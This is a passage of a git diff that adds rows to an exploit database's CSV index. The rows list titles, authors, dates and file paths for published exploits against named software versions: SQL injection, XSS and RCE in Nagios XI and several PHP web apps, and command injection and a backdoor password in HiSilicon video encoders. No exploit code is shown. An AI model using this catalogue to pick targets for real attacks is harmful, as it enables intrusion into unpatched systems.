+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index df3f74600..a1b83a21d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40710,6 +40710,22 @@ id,file,description,date,author,type,platform,port 48889,exploits/php/webapps/48889.txt,"Seat Reservation System 1.0 - Unauthenticated SQL Injection",2020-10-16,"Rahul Ramkumar",webapps,php, 48890,exploits/php/webapps/48890.txt,"CS-Cart 1.3.3 - 'classes_dir' LFI",2020-10-16,0xmmnbassel,webapps,php, 48891,exploits/php/webapps/48891.txt,"CS-Cart 1.3.3 - authenticated RCE",2020-10-16,0xmmnbassel,webapps,php, +48892,exploits/php/webapps/48892.txt,"Tourism Management System 1.0 - Arbitrary File Upload",2020-10-19,"Ankita Pal",webapps,php, +48893,exploits/php/webapps/48893.txt,"Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting",2020-10-19,"Matthew Aberegg",webapps,php, +48894,exploits/php/webapps/48894.txt,"Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php, +48895,exploits/php/webapps/48895.txt,"Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php, +48896,exploits/php/webapps/48896.txt,"Online Student's Management System 1.0 - Remote Code Execution (Authenticated)",2020-10-19,"Akıner Kısa",webapps,php, +48897,exploits/php/webapps/48897.txt,"Online Discussion Forum Site 1.0 - XSS in Messaging System",2020-10-19,j5oh,webapps,php, +48898,exploits/php/webapps/48898.txt,"Online Job Portal 1.0 - Cross Site Scripting (Stored)",2020-10-19,"Akıner Kısa",webapps,php, +48899,exploits/hardware/webapps/48899.sh,"HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal",2020-10-19,"Alexei Kojenov",webapps,hardware, +48900,exploits/hardware/webapps/48900.sh,"HiSilicon Video Encoders - RCE via unauthenticated command injection",2020-10-19,"Alexei Kojenov",webapps,hardware, +48901,exploits/hardware/webapps/48901.sh,"HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware",2020-10-19,"Alexei Kojenov",webapps,hardware, +48902,exploits/hardware/webapps/48902.sh,"HiSilicon Video Encoders - Full admin access via backdoor password",2020-10-19,"Alexei Kojenov",webapps,hardware, +48903,exploits/hardware/webapps/48903.sh,"HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)",2020-10-19,"Alexei Kojenov",webapps,hardware, +48904,exploits/java/webapps/48904.txt,"Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in",2020-10-19,"Daniel Morris",webapps,java, +48905,exploits/php/webapps/48905.txt,"Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)",2020-10-19,Kokn3t,webapps,php, +48906,exploits/php/webapps/48906.py,"Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)",2020-10-19,"Rodolfo Tavares",webapps,php, +48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,